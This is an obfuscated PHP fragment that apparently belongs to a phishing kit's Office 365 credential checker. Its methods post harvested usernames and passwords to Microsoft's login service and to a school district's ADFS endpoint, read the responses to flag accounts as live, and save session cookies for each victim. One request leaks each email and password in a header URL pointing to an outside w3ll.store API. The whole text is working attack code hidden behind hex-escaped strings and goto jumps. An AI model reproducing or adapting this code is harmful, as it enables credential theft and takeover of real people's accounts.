        curl_setopt($fda09, CURLOPT_HTTPHEADER, $A03d7);
        goto F09b1;
        Bcac7:
        if (!is_array($b0338)) {
            goto adf53;
        }
        goto Be7f9;
        Df2d7:
        $this->fac50 = $ea051[0];
        goto Da396;
        B1d5e:
        $this->ad1e3 = $eb813[0];
        goto Bcfed;
        f9d13:
    }
    private function AuthRedirect()
    {
        goto e5cb4;
        A56e3:
        $A03d7[] =
            "\x43\x61\143\150\x65\55\103\x6f\156\164\162\157\154\x3a\x20\x6d\141\x78\x2d\x61\x67\x65\x3d\x30";
        goto B8364;
        B70b0:
        $A03d7[] =
            "\103\x6f\x6e\156\145\143\x74\x69\x6f\x6e\72\x20\x6b\145\x65\x70\55\x61\x6c\151\x76\x65";
        goto A56e3;
        D27d3:
        $A03d7[] =
            "\123\145\143\55\106\145\164\x63\150\55\x4d\157\x64\x65\72\x20\156\141\166\x69\x67\141\164\x65";
        goto ac84b;
        D3628:
        $this->status["\x6c\151\166\x65"] = false;
        goto c8e30;
        aa707:
        curl_setopt($fda09, CURLOPT_RETURNTRANSFER, 1);
        goto Cc1de;
        d351d:
        if (
            !(
                strpos(
                    $A75e0,
                    "\111\156\x63\157\x72\162\x65\143\164\40\165\x73\145\x72\40\x49\104\40\157\x72\x20\x70\141\163\163\167\x6f\x72\144\x2e"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\131\157\165\x20\x64\x6f\156\47\x74\40\x68\141\166\x65\40\160\145\x72\155\x69\x73\163\x69\x6f\156\40\x74\157\x20\x61\143\143\145\x73\163"
                ) !== false
            )
        ) {
            goto Ca6f8;
        }
        goto D3628;
        B8364:
        $A03d7[] =
            "\x55\x70\x67\x72\141\x64\145\55\111\156\x73\145\x63\165\162\x65\55\122\145\161\x75\x65\163\x74\163\72\x20\61";
        goto ac63e;
        c8e30:
        Ca6f8:
        goto D89ac;
        f9b6b:
        curl_setopt(
            $fda09,
            CURLOPT_ENCODING,
            "\x67\x7a\x69\160\54\x20\144\x65\146\154\x61\164\x65"
        );
        goto Dd505;
        C5f5b:
        curl_close($fda09);
        goto d351d;
        C974b:
        curl_setopt($fda09, CURLOPT_POST, 1);
        goto c8681;
        Fdd16:
        $A03d7[] =
            "\x41\x63\143\145\x70\164\x3a\x20\164\x65\x78\x74\57\150\164\x6d\x6c\x2c\x61\160\x70\154\151\x63\141\164\151\157\156\x2f\170\x68\164\155\154\53\170\x6d\x6c\54\x61\160\160\x6c\x69\x63\141\x74\x69\x6f\156\x2f\170\155\x6c\x3b\161\75\60\56\x39\x2c\x69\155\141\x67\145\x2f\141\166\x69\x66\x2c\x69\x6d\x61\147\x65\x2f\167\145\142\x70\54\x69\x6d\x61\x67\145\x2f\141\160\x6e\x67\x2c\52\x2f\52\x3b\x71\x3d\60\x2e\x38\x2c\x61\x70\x70\x6c\x69\143\x61\164\x69\x6f\156\57\x73\151\147\x6e\x65\144\x2d\145\170\x63\x68\141\156\x67\x65\73\166\x3d\142\x33\73\x71\x3d\x30\x2e\71";
        goto B8eed;
        Dd505:
        $A03d7 = [];
        goto B70b0;
        Cc1de:
        curl_setopt($fda09, CURLOPT_CUSTOMREQUEST, "\120\x4f\x53\124");
        goto C974b;
        dc8ef:
        $A03d7[] =
            "\x52\x65\x66\x65\x72\145\x72\x3a\40" .
            $this->status["\162\145\x64\151\162\145\143\164"];
        goto cbc61;
        e5cb4:
        $fda09 = curl_init();
        goto D28c7;
        c8681:
        curl_setopt(
            $fda09,
            CURLOPT_POSTFIELDS,
            "\125\x73\145\x72\116\x61\155\x65\x3d{$this->Fa736}\x26\120\x61\x73\163\x77\x6f\x72\x64\x3d{$this->Ed558}\x26\x41\x75\164\x68\115\145\x74\x68\x6f\144\75\x46\x6f\x72\x6d\x73\101\x75\x74\150\145\156\164\151\x63\x61\164\151\x6f\x6e"
        );
        goto f9b6b;
        D28c7:
        curl_setopt(
            $fda09,
            CURLOPT_URL,
            $this->status["\162\x65\144\x69\162\145\x63\164"]
        );
        goto aa707;
        cbc61:
        $A03d7[] =
            "\101\x63\x63\145\x70\164\x2d\x4c\141\x6e\147\x75\141\x67\145\x3a\x20\x65\156\55\125\x53\x2c\145\x6e\73\161\x3d\60\56\71";
        goto d935c;
        B8eed:
        $A03d7[] =
            "\123\x65\x63\x2d\x46\x65\164\143\x68\x2d\123\x69\164\x65\72\x20\163\x61\155\145\55\157\162\151\147\x69\156";
        goto D27d3;
        E89d3:
        $A03d7[] =
            "\x55\163\x65\162\55\101\147\x65\x6e\164\72\x20\115\157\172\x69\154\x6c\x61\x2f\x35\56\x30\40\x28\151\x50\150\x6f\156\145\x3b\x20\x43\120\125\40\x69\x50\x68\x6f\x6e\145\x20\x4f\123\x20\61\63\x5f\x32\137\63\x20\154\151\x6b\145\40\x4d\141\143\x20\117\123\x20\130\x29\x20\101\x70\x70\x6c\145\x57\x65\142\113\x69\x74\x2f\x36\60\65\x2e\61\x2e\61\65\x20\x28\113\110\x54\x4d\114\54\40\x6c\x69\x6b\x65\40\107\x65\143\x6b\x6f\51\40\x56\x65\x72\163\151\x6f\x6e\57\61\63\x2e\x30\56\63\x20\x4d\157\x62\x69\154\x65\57\61\65\x45\61\64\x38\x20\123\141\x66\x61\x72\x69\x2f\66\60\x34\56\x31";
        goto Fdd16;
        d8637:
        $A03d7[] =
            "\103\x6f\156\164\145\156\x74\55\124\x79\x70\x65\72\x20\x61\160\160\x6c\x69\143\141\164\151\x6f\x6e\x2f\x78\x2d\x77\167\x77\x2d\146\x6f\x72\x6d\x2d\x75\x72\154\x65\x6e\x63\x6f\144\x65\144";
        goto E89d3;
        De48b:
        $A03d7[] =
            "\123\145\143\55\106\145\x74\143\150\55\104\x65\163\164\x3a\x20\144\157\x63\x75\x6d\145\x6e\164";
        goto dc8ef;
        ac63e:
        $A03d7[] =
            "\117\162\x69\147\151\156\x3a\40\x68\x74\x74\160\163\72\x2f\57\141\144\146\x73\56\143\155\163\56\x6b\61\62\x2e\156\x63\x2e\165\163";
        goto d8637;
        ac84b:
        $A03d7[] =
            "\123\x65\143\55\x46\x65\164\x63\150\55\125\163\145\162\x3a\40\77\x31";
        goto De48b;
        d720b:
        curl_setopt($fda09, CURLOPT_HTTPHEADER, $A03d7);
        goto D13e2;
        d935c:
        $A03d7[] =
            "\103\157\x6f\153\x69\145\72\40\x4d\x53\x49\123\x4c\157\x6f\160\104\x65\x74\145\143\x74\151\157\x6e\x43\157\157\153\x69\x65\x3d\x4d\x6a\x41\x79\x4d\123\60\167\117\x43\x30\170\x4d\x7a\x6f\x77\115\172\157\61\x4d\172\157\x79\x4e\154\160\x63\115\x51\75\x3d";
        goto d720b;
        D13e2:
        $A75e0 = curl_exec($fda09);
        goto C5f5b;
        D89ac:
    }
    private function AuthDouble()
    {
        goto Fec57;
        Fec57:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\x2f\143\157\x6f\x6b\x69\145\137" .
                $this->Fa736 .
                "\56\x74\x78\x74",
            true
        );
        goto fdc64;
        E3771:
        $this->ad1e3 = $eb813[0];
        goto cd82b;
        cd82b:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\57\x63\157\x6f\x6b\x69\145\137" .
                $this->Fa736 .
                "\56\x74\x78\164",
            true
        );
        goto F2956;
        d0366:
        Efe94:
        goto A3b26;
        A1f25:
        $Accd6 = $Bcc9d->post(
            "\150\x74\164\x70\x73\72\x2f\57\154\157\x67\x69\x6e\x2e\x6d\151\x63\x72\x6f\163\157\x66\x74\x6f\x6e\x6c\x69\156\x65\56\x63\x6f\155\57\141\x70\160\x76\x65\162\x69\x66\171",
            [
                "\x68\145\141\144\145\162\x73" => [
                    "\x43\157\156\156\x65\x63\x74\151\157\156" =>
                        "\153\x65\x65\160\55\141\154\151\x76\145",
                    "\103\141\x63\x68\145\x2d\103\157\156\164\x72\x6f\x6c" =>
                        "\156\x6f\x2d\x63\141\x63\x68\x65",
                    "\x55\x70\x67\x72\141\x64\145\55\x49\156\x73\145\x63\165\162\x65\55\122\145\161\165\145\x73\164\163" =>
                        "\61",
                    "\117\x72\151\x67\x69\x6e" => "\156\165\154\154",
                    "\103\x6f\156\x74\145\x6e\164\55\x54\171\160\x65" =>
                        "\x61\160\x70\x6c\x69\143\x61\x74\x69\x6f\156\x2f\170\x2d\x77\167\x77\x2d\x66\x6f\x72\x6d\55\165\x72\x6c\145\156\x63\157\144\145\x64",
                    "\125\x73\x65\x72\55\x41\x67\145\x6e\x74" =>
                        "\115\x6f\x7a\151\154\154\141\57\65\x2e\x30\40\50\127\151\156\144\157\167\163\40\x4e\124\x20\x31\x30\56\x30\73\40\x57\x69\156\66\64\x3b\x20\x78\x36\64\x29\x20\101\160\x70\x6c\x65\x57\145\142\113\x69\x74\x2f\x35\x33\67\56\x33\x36\40\50\113\110\124\x4d\114\54\x20\154\151\x6b\145\40\x47\x65\x63\x6b\x6f\51\40\x43\x68\162\x6f\x6d\145\57\61\63\x30\x2e\60\56\x30\x2e\60\40\123\141\x66\141\162\x69\x2f\x35\x33\67\x2e\x33\66\x20\105\144\x67\x2f\x31\63\60\x2e\60\56\x30\56\x30",
                    "\101\143\143\x65\160\x74" =>
                        "\164\145\170\164\57\x68\x74\155\154\x2c\141\160\160\154\151\143\141\x74\151\157\x6e\x2f\170\x68\164\x6d\154\53\170\155\x6c\54\x61\x70\x70\154\x69\x63\141\164\x69\157\156\57\x78\x6d\154\73\x71\75\60\x2e\x39\54\x69\x6d\141\x67\145\x2f\x61\166\151\146\54\x69\155\141\147\x65\x2f\x77\145\x62\160\x2c\151\x6d\141\147\x65\57\x61\160\x6e\147\x2c\x2a\x2f\52\73\x71\x3d\60\x2e\x38\54\141\160\160\154\151\x63\x61\x74\x69\157\156\x2f\x73\151\x67\156\x65\144\x2d\145\x78\143\x68\x61\x6e\x67\145\x3b\166\x3d\142\63\x3b\161\x3d\60\x2e\x37",
                    "\101\x63\143\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\141\x67\145" =>
                        "\145\x6e\55\125\123\x2c\145\156\73\x71\x3d\x30\x2e\71",
                    "\x52\145\146\x65\162\x65\x72" =>
                        "\x68\x74\x74\x70\163\x3a\x2f\x2f\x77\x33\154\x6c\56\163\164\x6f\162\x65\x2f\141\160\x69\57\x6f\146\x66\x69\143\x65\x2d\x76\141\x6c\x3f\x65\x6d\141\x69\x6c\75" .
                        $this->Fa736 .
                        "\x26\160\141\x73\x73\75" .
                        $this->Ed558,
                    "\x43\157\157\153\x69\145" => $this->gencook(
                        $this->A20d7 .
                            "\x2f\143\157\157\x6b\x69\x65\137" .
                            $this->Fa736 .
                            "\56\x74\x78\x74"
                    ),
                ],
                "\146\x6f\x72\155\x5f\x70\x61\x72\141\x6d\x73" => [
                    "\103\157\156\164\x69\x6e\165\145\x41\165\x74\x68" =>
                        "\x74\162\x75\x65",
                    "\x63\x74\x78" => $this->cc473,
                    "\150\160\x67\x72\x65\x71\165\x65\x73\164\x69\144" =>
                        "\61\146\61\62\x64\x31\64\x63\x2d\67\x61\64\x32\55\64\x35\64\62\x2d\142\x65\x37\x39\55\67\70\146\x35\x39\62\146\x39\x36\x38\60\60",
                    "\146\x6c\x6f\x77\124\x6f\x6b\145\x6e" => $this->fac50,
                    "\x69\163\x63\x73\162\146\163\x70\x65\x65\x64\142\165\x6d\x70" =>
                        "\164\x72\165\x65",
                    "\x63\141\156\x61\x72\x79" => $this->B5b07,
                    "\x69\x31\71" => "\64\66\x32\x34",
                ],
            ]
        );
        goto c8908;
        c6ed6:
        preg_match(
            "\x2f\x28\77\x3c\75\x22\163\103\164\x78\42\72\x22\x29\x5b\136\42\x5d\x2a\x2f",
            $A75e0,
            $Bc3b4
        );
        goto d8680;
        E6c0b:
        $this->fac50 = $ea051[0];
        goto Fa93d;
        c8908:
        $F16be->save(
            $this->A20d7 .
                "\57\143\157\x6f\x6b\151\145\137" .
                $this->Fa736 .
                "\x2e\x74\170\x74"
        );
        goto C9218;
        Ce442:
        preg_match(
            "\x2f\50\77\x3c\x3d\x22\x73\106\124\42\x3a\42\51\x5b\136\42\x5d\x2a\x2f",
            $A75e0,
            $ea051
        );
        goto c6ed6;
        A4b5e:
        $A75e0 = $Accd6->getBody()->getContents();
        goto Ce442;
        b3a4b:
        $this->B522d = $a6081[0];
        goto E1e92;
        d932d:
        goto fcfe2;
        goto D4edd;
        D9336:
        $this->status["\154\151\166\145"] = true;
        goto Cf48e;
        fdc64:
        $Bcc9d = new Client(["\x63\x6f\x6f\153\151\x65\x73" => $F16be]);
        goto Ff3e0;
        bf820:
        $this->B5b07 = $ef175[0];
        goto b3a4b;
        E1e92:
        $this->E423c = $D70fc[0];
        goto E3771;
        D4edd:
        A8aa1:
        goto D9336;
        C34e9:
        preg_match(
            "\57\50\x3f\x3c\75\42\141\x70\x69\103\x61\x6e\x61\x72\171\x22\x3a\x22\51\133\136\x22\x5d\x2a\57",
            $A75e0,
            $a6081
        );
        goto ca5f4;
        F2956:
        $Bcc9d = new Client(["\143\x6f\157\153\151\x65\x73" => $F16be]);
        goto A1f25;
        Cf48e:
        fcfe2:
        goto B6257;
        d8680:
        preg_match(
            "\57\x28\77\x3c\75\x22\143\x61\156\141\x72\171\x22\72\x22\51\x5b\136\x22\135\52\57",
            $A75e0,
            $ef175
        );
        goto C34e9;
        Cd218:
        $this->status["\x6c\151\x76\145"] = false;
        goto d0366;
        ce7d6:
        $F16be->save(
            $this->A20d7 .
                "\x2f\143\x6f\x6f\x6b\x69\x65\137" .
                $this->Fa736 .
                "\56\x74\x78\164"
        );
        goto A4b5e;
        Fa93d:
        $this->cc473 = $Bc3b4[0];
        goto bf820;
        C9218:
        $A75e0 = $Accd6->getBody()->getContents();
        goto A1f17;
        Fc940:
        preg_match(
            "\57\50\x3f\74\x3d\42\143\x6f\162\162\x65\x6c\141\164\x69\x6f\x6e\111\x64\42\x3a\x22\51\x5b\136\x22\135\x2a\x2f",
            $A75e0,
            $eb813
        );
        goto E6c0b;
        E4afe:
        A00a4:
        goto Cd218;
        ca5f4:
        preg_match(
            "\57\50\x3f\x3c\x3d\42\163\145\x73\x73\151\x6f\156\111\144\x22\72\42\x29\x5b\136\x22\135\52\x2f",
            $A75e0,
            $D70fc
        );
        goto Fc940;
        f9000:
        if (
            strpos(
                $A75e0,
                "\x55\160\x64\141\x74\x65\40\171\x6f\165\x72\40\x70\x61\x73\x73\x77\157\x72\x64"
            ) !== false
        ) {
            goto A8aa1;
        }
        goto Db3fd;
        A1f17:
        if (
            strpos(
                $A75e0,
                "\131\x6f\165\162\40\141\143\143\x6f\x75\x6e\164\40\x6f\162\40\160\x61\163\x73\167\157\x72\x64\40\151\163\x20\151\156\x63\x6f\162\162\145\x63\x74"
            ) !== false ||
            strpos(
                $A75e0,
                "\x54\150\145\40\x70\141\x73\x73\167\157\x72\144\40\145\x6e\164\x65\x72\145\144\40\145\170\143\x65\x65\x64\x73\x20\164\150\x65\x20\x6d\x61\x78\x69\x6d\165\x6d\40\154\145\x6e\x67\x74\x68"
            ) ||
            strpos($A75e0, "\102\x61\x64\x20\x52\x65\161\165\145\x73\x74") !==
                false ||
            strpos($A75e0, "\147\157\x6f\147\x6c\145\142\x6f\164") !== false ||
            strpos(
                $A75e0,
                "\123\x65\154\x65\143\x74\x20\141\40\x63\x65\162\x74\151\146\x69\143\x61\x74\145\40"
            ) !== false ||
            strpos(
                $A75e0,
                "\x73\155\165\x73\170\x61\x74\150\56\142\155\x73\x2e\143\157\155"
            ) !== false ||
            strpos(
                $A75e0,
                "\x6e\x6f\164\40\x73\x75\160\160\157\162\164\40\x4a\141\x76\141\123\x63\162\151\160\x74"
            ) !== false ||
            strpos(
                $A75e0,
                "\164\x72\x6f\x75\x62\154\x65\x20\x73\151\147\156\151\156\x67"
            ) !== false ||
            strpos(
                $A75e0,
                "\x68\x61\x76\x69\156\147\x20\x73\x6f\x6d\145\x20\163\145\x72\166\145\162\40\x69\x73\163\x75\x65\163"
            ) !== false ||
            strpos($A75e0, "\x61\x70\x70\154\x65\56\x63\157\x6d") !== false ||
            strpos($A75e0, "\x4e\157\x74\40\101\x6c\x6c\157\167\145\144") !==
                false ||
            strpos($A75e0, "\x2e\141\x6f\156\56\x63\157\x6d") !== false ||
            strpos(
                $A75e0,
                "\x46\x69\x66\x74\150\x20\x54\150\151\x72\x64\40\111\104"
            ) !== false ||
            strpos(
                $A75e0,
                "\103\157\156\146\151\147\x75\162\x61\x62\x6c\x65\40\x64\145\146\x61\x75\154\164\40\x62\145\150\x61\x76\x69\157\x72"
            ) !== false ||
            strpos(
                $A75e0,
                "\x70\145\x72\163\155\x69\163\x73\151\x6f\156\x73\x20\164\x6f\40\141\143\x63\x65\163\163\40\164\x68\x69\163\40\162\x65\163\x6f\x75\x72\x63\145"
            ) !== false ||
            strpos(
                $A75e0,
                "\165\162\x6c\x4d\x73\x61\x53\151\147\156\125\160"
            ) !== false
        ) {
            goto A00a4;
        }
        goto f9000;
        Db3fd:
        $this->status["\154\151\x76\x65"] = false;
        goto d932d;
        Ff3e0:
        $Accd6 = $Bcc9d->post(
            "\150\164\164\160\163\x3a\57\57\154\x6f\x67\151\x6e\x2e\x6d\x69\143\162\x6f\x73\x6f\146\x74\x6f\156\154\x69\156\x65\x2e\x63\x6f\x6d\57\x63\x6f\x6d\155\157\x6e\57\154\x6f\x67\x69\x6e",
            [
                "\x68\145\x61\144\145\162\163" => [
                    "\125\x73\145\x72\55\101\147\x65\x6e\x74" =>
                        "\x4d\157\172\151\154\154\141\57\x35\x2e\x30\x20\x28\x4d\141\143\151\x6e\x74\157\163\x68\73\40\111\x6e\x74\145\x6c\40\x4d\x61\x63\40\117\123\x20\130\x20\61\60\x2e\x31\x35\x3b\x20\162\166\72\x31\x30\71\x2e\60\x29\40\107\x65\143\153\x6f\57\x32\x30\x31\60\x30\61\x30\x31\x20\x46\x69\x72\145\x66\157\x78\57\61\61\x33\x2e\60",
                    "\101\x63\x63\x65\x70\164" =>
                        "\164\x65\x78\x74\57\x68\x74\x6d\x6c\54\x61\x70\x70\154\x69\143\x61\x74\151\157\x6e\57\170\x68\164\x6d\x6c\x2b\170\155\154\54\141\160\x70\154\151\x63\x61\x74\151\x6f\156\57\170\x6d\x6c\x3b\161\x3d\x30\56\71\x2c\x69\x6d\141\x67\145\57\141\166\x69\x66\54\x69\x6d\141\x67\x65\x2f\x77\x65\x62\160\54\52\x2f\x2a\73\x71\x3d\x30\x2e\x38",
                    "\x41\143\x63\145\x70\x74\x2d\x4c\x61\x6e\147\x75\141\147\x65" =>
                        "\x65\156\x2d\125\123\54\x65\x6e\73\161\75\x30\56\x35",
                    "\101\143\143\145\x70\x74\55\x45\x6e\x63\x6f\144\x69\156\x67" =>
                        "\x67\x7a\151\x70\54\x20\144\145\146\x6c\141\164\145\x2c\40\x62\162",
                    "\122\145\146\145\162\145\x72" =>
                        "\x68\x74\164\x70\x73\x3a\57\x2f\x6c\x6f\147\151\156\x2e\x6d\x69\143\162\157\163\157\146\x74\157\156\x6c\x69\156\145\x2e\x63\x6f\155\x2f\x63\157\155\155\x6f\x6e\x2f\157\x61\x75\164\x68\x32\x2f\x76\x32\56\60\x2f\x61\x75\x74\150\157\162\151\172\145\x3f\143\x6c\151\x65\156\164\137\x69\x64\75\x34\67\66\x35\64\64\65\142\x2d\63\62\x63\x36\55\x34\71\142\x30\55\70\63\145\x36\x2d\x31\x64\71\63\67\x36\65\x32\67\x36\x63\141\46\162\145\x64\x69\x72\145\143\164\x5f\165\162\151\75\x68\164\164\160\x73\x25\63\101\45\62\x46\45\62\x46\167\x77\167\x2e\x6f\x66\146\151\x63\145\x2e\143\x6f\x6d\45\x32\x46\154\x61\156\x64\151\156\147\x76\x32\x26\162\145\x73\160\x6f\x6e\163\145\x5f\164\x79\x70\145\x3d\143\157\144\145\45\x32\60\151\x64\137\164\157\153\145\156\x26\x73\x63\x6f\160\145\75\157\160\x65\x6e\x69\x64\45\62\x30\x70\162\157\146\151\x6c\x65\45\62\60\150\x74\x74\x70\x73\45\x33\101\x25\x32\106\x25\62\x46\167\167\x77\x2e\157\146\x66\151\x63\145\56\143\x6f\x6d\45\62\106\166\x32\x25\62\106\117\x66\146\151\143\145\110\x6f\155\x65\x2e\101\x6c\x6c\46\162\145\163\160\157\156\x73\145\x5f\155\x6f\144\145\x3d\146\x6f\x72\155\x5f\160\157\163\x74\46\x6e\x6f\156\x63\x65\x3d\x36\63\x38\62\62\63\x33\67\64\67\62\66\x35\60\71\65\x38\63\x2e\x4f\x57\121\x33\x4f\104\x41\x33\115\x54\x67\x74\131\x54\101\x34\131\x53\x30\60\x5a\x6d\x4a\153\114\127\x46\x6d\x5a\104\x67\x74\x4e\127\x52\154\116\x6a\x46\150\x4e\107\105\x30\x4f\x57\106\x6c\115\x54\x56\x69\x4f\124\106\151\116\x6a\131\x74\132\x44\132\154\115\123\x30\x30\131\x6a\147\61\x4c\124\153\172\x4d\107\115\164\x4f\124\147\60\117\x44\x59\64\x5a\x6a\154\153\x4f\127\x45\62\46\165\151\x5f\x6c\157\143\141\154\x65\x73\75\145\156\55\125\123\x26\155\153\164\75\x65\x6e\55\x55\x53\46\x63\x6c\x69\x65\x6e\164\x2d\162\x65\161\165\x65\163\164\55\151\144\75\143\65\141\x64\144\x30\63\x65\x2d\141\63\62\61\55\x34\141\70\x61\55\x38\63\x30\x34\x2d\x37\x31\x38\x63\61\x30\x65\71\x35\x33\x33\x32\46\163\164\x61\164\x65\x3d\137\120\152\62\x58\x56\60\x6f\x43\x6b\x78\55\x4d\107\x31\160\x65\x5a\141\165\x4f\x41\x55\117\62\155\171\111\162\x4e\103\x37\167\170\x55\124\102\67\x66\x73\x65\115\62\65\x65\64\x67\114\x46\x35\60\104\x79\114\x57\150\x79\x43\143\132\167\x41\151\172\131\146\x51\64\x61\x63\170\x55\124\x76\x2d\x79\x68\104\161\x58\172\55\171\x56\x36\102\x6e\x5f\64\x74\102\130\x73\x4b\124\70\70\142\x45\x52\165\x4e\145\143\x6f\164\x54\x33\162\x43\x6c\x78\x75\122\160\143\64\x38\155\x73\160\163\157\x52\120\x47\x76\156\61\101\x6a\x73\x77\146\152\61\x6d\x38\167\x63\x39\x4c\x6b\124\x49\103\x56\x5f\154\127\123\x39\112\113\x73\x53\143\156\163\131\114\131\101\121\71\x34\113\x69\115\154\x4a\x30\x4b\105\x71\x76\71\x34\146\x47\107\x47\x65\150\152\162\116\156\x4d\x5a\x49\107\x70\x68\x58\x71\x67\155\x4b\167\155\x41\122\126\x52\x59\150\170\x50\167\x56\x4c\110\x63\121\105\64\123\x4b\61\146\x76\x55\x6c\117\x58\102\x79\x34\x52\150\143\x37\x4d\x58\62\x6c\101\61\x62\63\x61\116\x67\x55\114\113\x45\171\150\x48\122\x36\65\66\x32\66\153\171\147\125\171\147\101\71\x32\x62\x50\151\x6a\130\x76\x4e\103\x6d\x32\60\x77\x26\170\55\143\154\x69\x65\156\x74\55\123\113\125\x3d\111\104\x5f\116\105\x54\66\137\x30\46\x78\55\x63\x6c\151\x65\x6e\164\55\x76\145\x72\x3d\66\56\62\x36\56\x31\56\x30",
                    "\103\157\x6e\164\x65\x6e\x74\55\124\171\160\145" =>
                        "\141\160\x70\x6c\x69\143\141\x74\151\157\156\x2f\x78\x2d\167\x77\x77\55\x66\157\162\155\x2d\x75\162\x6c\145\156\143\x6f\x64\145\144",
                    "\117\162\x69\x67\x69\x6e" =>
                        "\150\164\164\160\163\72\x2f\x2f\154\x6f\x67\151\156\x2e\155\x69\143\162\157\163\x6f\146\164\157\156\154\x69\156\145\56\143\157\155",
                    "\x43\x6f\x6e\x6e\145\143\x74\151\x6f\156" =>
                        "\x6b\x65\145\x70\55\x61\x6c\x69\x76\145",
                    "\125\x70\x67\162\x61\144\145\55\111\156\x73\x65\x63\x75\x72\x65\55\122\145\x71\165\x65\x73\164\x73" =>
                        "\61",
                    "\x53\145\143\55\106\x65\x74\143\150\55\104\145\x73\x74" =>
                        "\x64\x6f\x63\x75\155\x65\x6e\164",
                    "\123\145\143\55\x46\145\x74\x63\150\55\x4d\x6f\x64\x65" =>
                        "\156\141\x76\x69\x67\x61\164\x65",
                    "\123\x65\143\55\106\x65\164\x63\150\x2d\123\x69\x74\x65" =>
                        "\x73\x61\x6d\145\x2d\157\162\151\147\151\156",
                    "\123\145\143\x2d\x46\145\164\x63\150\55\125\163\145\162" =>
                        "\x3f\61",
                    "\x43\157\x6f\153\x69\x65" => $this->gencook(
                        $this->A20d7 .
                            "\57\x63\x6f\x6f\x6b\151\x65\137" .
                            $this->Fa736 .
                            "\56\164\x78\x74"
                    ),
                ],
                "\146\x6f\162\x6d\137\160\x61\x72\x61\x6d\163" => [
                    "\151\61\63" => "\60",
                    "\154\157\x67\151\x6e" => $this->Fa736,
                    "\x6c\x6f\147\x69\156\x66\x6d\164" => $this->Fa736,
                    "\164\x79\x70\x65" => "\61\61",
                    "\114\x6f\x67\151\156\117\x70\x74\x69\157\156\163" =>
                        "\x33",
                    "\154\x72\164" => "",
                    "\154\162\x74\x50\x61\162\x74\x69\x74\x69\x6f\x6e" => "",
                    "\150\151\x73\122\145\x67\151\157\156" => "",
                    "\x68\x69\x73\x53\143\x61\154\x65\125\156\x69\x74" => "",
                    "\160\x61\x73\x73\x77\144" => $this->Ed558,
                    "\160\163" => "\x32",
                    "\160\163\122\116\x47\x43\x44\145\146\141\x75\154\x74\124\171\160\145" =>
                        "",
                    "\x70\x73\122\116\107\x43\x45\156\x74\x72\x6f\x70\171" =>
                        "",
                    "\x70\x73\122\116\x47\x43\x53\x4c\x4b" => "",
                    "\x63\x61\156\141\162\x79" => $this->B5b07,
                    "\x63\x74\170" => $this->cc473,
                    "\x68\160\147\162\145\161\165\145\x73\164\x69\x64" =>
                        "\141\60\x36\x38\x36\x61\64\x32\55\62\60\66\x61\x2d\x34\x31\x33\x64\55\142\63\x65\145\55\142\x61\142\142\x66\x66\x32\65\60\x36\x30\x30",
                    "\x66\154\157\x77\x54\157\x6b\145\x6e" => $this->fac50,
                    "\x50\120\x53\x58" => "",
                    "\x4e\x65\167\125\x73\x65\x72" => "\x31",
                    "\106\157\165\156\x64\x4d\x53\101\x73" => "",
                    "\x66\163\x70\157\163\x74" => "\60",
                    "\x69\62\x31" => "\60",
                    "\x43\x6f\x6f\153\151\x65\x44\151\x73\143\x6c\x6f\x73\x75\162\145" =>
                        "\60",
                    "\111\x73\106\151\144\157\x53\165\160\160\x6f\162\x74\x65\x64" =>
                        "\x30",
                    "\x69\x73\x53\x69\x67\156\x75\160\x50\157\163\x74" => "\60",
                    "\x69\61\71" => "\61\60\x36\71\67\65",
                ],
            ]
        );
        goto ce7d6;
        B6257:
        goto Efe94;
        goto E4afe;
        A3b26:
    }
    private function AuthBusiness()
    {
        goto a9cff;
        F75e3:
        $Accd6 = $Bcc9d->request(
            "\x47\105\124",
            "\150\x74\x74\160\x73\x3a\x2f\x2f\x64\145\x76\x69\x63\145\x2e\154\157\x67\151\156\56\155\151\143\162\x6f\x73\157\146\164\x6f\x6e\x6c\151\156\145\x2e\x63\x6f\155\x3a\x34\64\x33",
            [
                "\150\145\141\x64\145\x72\163" => [
                    "\101\143\x63\x65\160\164" =>
                        "\x74\145\170\x74\57\x68\164\x6d\154\x2c\141\x70\x70\154\x69\143\141\164\x69\x6f\x6e\57\x78\150\164\x6d\x6c\53\170\155\x6c\x2c\141\160\x70\154\151\143\141\164\151\157\x6e\57\170\x6d\x6c\73\161\75\x30\x2e\71\54\151\x6d\141\x67\145\x2f\141\166\x69\x66\54\x69\x6d\x61\x67\x65\x2f\167\x65\x62\x70\x2c\151\155\x61\x67\x65\x2f\x61\x70\x6e\147\x2c\52\57\52\x3b\161\x3d\60\56\x38\54\141\x70\x70\x6c\x69\143\141\x74\151\157\156\57\163\x69\x67\x6e\x65\x64\55\x65\170\143\150\141\156\147\145\x3b\x76\x3d\x62\x33\73\x71\x3d\x30\x2e\x37",
                    "\101\x63\143\145\160\x74\x2d\114\141\x6e\147\165\x61\147\145" =>
                        "\145\156\x2d\125\123\54\x65\156\73\161\75\x30\x2e\x39",
                    "\x43\157\x6f\153\x69\x65" => $this->gencook(
                        $this->A20d7 .
                            "\x2f\143\157\x6f\x6b\151\x65\x5f" .
                            $this->Fa736 .
                            "\x2e\x74\x78\164"
                    ),
                    "\x50\162\151\x6f\x72\151\164\x79" =>
                        "\165\x3d\x30\x2c\x20\151",
                    "\123\x65\x63\55\103\x68\x2d\125\141" =>
                        "\x22\103\150\x72\x6f\155\151\x75\x6d\42\73\x76\x3d\x22\x31\x32\x38\42\54\40\x22\x4e\x6f\164\73\101\x3d\102\162\141\156\144\x22\x3b\x76\75\x22\62\64\42\54\40\42\115\151\143\162\157\163\x6f\146\x74\x20\x45\144\x67\x65\42\73\166\75\42\x31\62\70\x22",
                    "\x53\x65\x63\55\x43\x68\x2d\125\141\x2d\115\x6f\x62\x69\154\145" =>
                        "\x3f\x30",
                    "\123\145\143\x2d\x43\150\55\125\x61\x2d\120\154\141\x74\x66\157\162\155" =>
                        "\x22\x57\151\156\144\x6f\x77\x73\x22",
                    "\x53\x65\x63\x2d\x43\x68\55\125\x61\55\x50\154\141\164\x66\x6f\162\155\55\126\x65\x72\x73\x69\157\x6e" =>
                        "\x22\61\65\56\x30\56\x30\42",
                    "\x53\145\143\55\x46\x65\x74\x63\150\x2d\104\x65\163\x74" =>
                        "\x64\157\x63\165\155\x65\x6e\164",
                    "\x53\145\x63\x2d\106\x65\164\x63\150\x2d\x4d\x6f\144\x65" =>
                        "\156\x61\166\151\x67\141\x74\x65",
                    "\123\x65\143\x2d\106\145\164\x63\150\x2d\x53\151\164\145" =>
